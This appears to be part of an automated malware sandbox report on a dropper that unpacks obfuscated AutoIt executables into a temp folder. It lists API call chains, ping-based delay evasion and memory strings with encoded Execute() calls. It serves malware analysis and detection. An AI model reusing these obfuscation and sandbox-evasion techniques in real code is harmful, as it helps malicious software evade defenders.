Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0078E93F push edi; ret 5_2_0078E941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0078EA58 push esi; ret 5_2_0078EA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C8A4A push FFFFFF8Bh; iretd 5_2_007C8A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_00788B75 push ecx; ret 5_2_00788B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0077CBDB push eax; retf 5_2_0077CBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0078EC33 push esi; ret 5_2_0078EC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0077CC06 push eax; retf 5_2_0077CBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_0078ED1C push edi; ret 5_2_0078ED1E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A7E93F push edi; ret 7_2_00A7E941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AB8A4A push FFFFFF8Bh; iretd 7_2_00AB8A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A7EA58 push esi; ret 7_2_00A7EA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A78B75 push ecx; ret 7_2_00A78B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A7EC33 push esi; ret 7_2_00A7EC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A7ED1C push edi; ret 7_2_00A7ED1E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FE93F push edi; ret 11_2_003FE941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00438A4A push FFFFFF8Bh; iretd 11_2_00438A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FEA58 push esi; ret 11_2_003FEA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F8B75 push ecx; ret 11_2_003F8B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003ECBF4 push eax; retf 11_2_003ECBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FEC33 push esi; ret 11_2_003FEC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FED1C push edi; ret 11_2_003FED1E

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_00775EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AD59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00A65EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_004559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003E5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comAPI coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comAPI coverage: 4.0 %
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comAPI coverage: 4.2 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409054 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409054
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00403186 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403186
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402A8E FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402A8E
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402B9F FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402B9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_007C494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD14 FindFirstFileW,FindClose,5_2_007CCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_007CCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB494A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00AB494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00ABCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD14 FindFirstFileW,FindClose,7_2_00ABCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0043494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00434005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00434005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043C2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD14 FindFirstFileW,FindClose,11_2_0043CD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0043CD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043FA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00433CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00433CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00775D13
Source: Bonta.exe.com, 00000007.00000003.1723632225.000000000357B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJG_112
Source: Bonta.exe.com, 00000007.00000003.1724859366.00000000034AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ImcUYqPiljrtfCXuiybhGfsGnPyqZsDGmIGOiUjxeHzzdrbOpfUfToF;
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc'
Source: Inebriarti.exe.com, 00000005.00000003.1752328553.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1752435949.0000000003713000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1753609737.000000000372B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1752745370.000000000372A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF02#121#45#44#<l&
Source: Bonta.exe.com, 0000000A.00000002.2926103840.0000000003A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GKHRXXDEQEMuQreonZWtXO
Source: Inebriarti.exe.com, 00000005.00000003.1748045980.00000000039F3000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926448957.00000000041AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711066834.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696988883.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696668926.0000000000C84000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1695659728.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711553711.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1708881008.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711228480.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711402478.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1705319177.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $VdwHnUJpYBHGiro = Execute(GKHRXxdEq("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_77_88_78_126_116_116_131_76_92_48_50",9)), $XDDiCUzGlnMH = 'ImcUYqPiljrtfCXuiybhGfsGnP'
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $mUnGEjvcQyyHiw = Execute(rETgxIUQ("88#121#119#110#115#108#78#120#75#113#116#102#121#45#44#111#109#115#90#105#88#108#103#112#89#114#70#106#103#44#46",5)), $oMLzKVgHrLiAtG = 'kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF'
Source: Inebriarti.exe.com, 00000005.00000003.1748045980.00000000039F3000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926448957.00000000041AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Tt843YGUx5.exe, 00000000.00000003.1680799306.0000000003850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $VjItThBcFgJSTh = Execute(ekrSXFezU("71#117#108#121#104#74#104#119#86#104#117#108#100#111#43#42#92#122#80#120#74#102#88#111#93#42#44",3)), $LHtIufRxUd = 'rAAViyZFlUnFeoHWSZCenyXOWRCUyyhgfSUBjlm'
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711066834.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696988883.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696668926.0000000000C84000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1695659728.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711553711.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1708881008.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711228480.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711402478.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1714793493.0000000000D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $DxgKjzXtlDLONYMZ = 'VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJG'
Source: Inebriarti.exe.com, 00000008.00000002.2925428546.0000000003EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF118#109#119#1
Source: Inebriarti.exe.com, 00000008.00000002.2923702335.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $mUnGEjvcQyyHiw = Execute(rETgxIUQ("88#121#119#110#115#108#78#120#75#113#116#102#121#45#44#111#109#115#90#105#88#108#103#112#89#114#70#106#103#44#46",5)), $oMLzKVgHrLiAtG = 'kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF'q
Source: Inebriarti.exe.com, 00000008.00000002.2924070634.000000000154E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $lDMfBZXyYdklEnPNzTqemusNJakRrSoysInesZUWmdfquUcTLKIzvBh = 18 To 390^X
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711244049.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711027703.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710380764.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711155587.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $lDMfBZXyYdklEnPNzTqemusNJakRrSoysInesZUWmdfquUcTLKIzvBh = 18 To 39
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Tt843YGUx5.exe, 00000000.00000003.1680799306.0000000003850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $FtFgHgfSLDQHNz = $FtFgHgfSLDQHNz + 1
Source: Bonta.exe.com, 0000000A.00000002.2926371266.0000000003AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710670447.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710792928.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706721244.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $xTAygaMnGSysza = 'UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK'N
Source: Inebriarti.exe.com, 00000008.00000002.2927741205.0000000004773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: Bonta.exe.com, 0000000A.00000002.2925494466.0000000003840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJGX
Source: Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710670447.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706721244.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc''
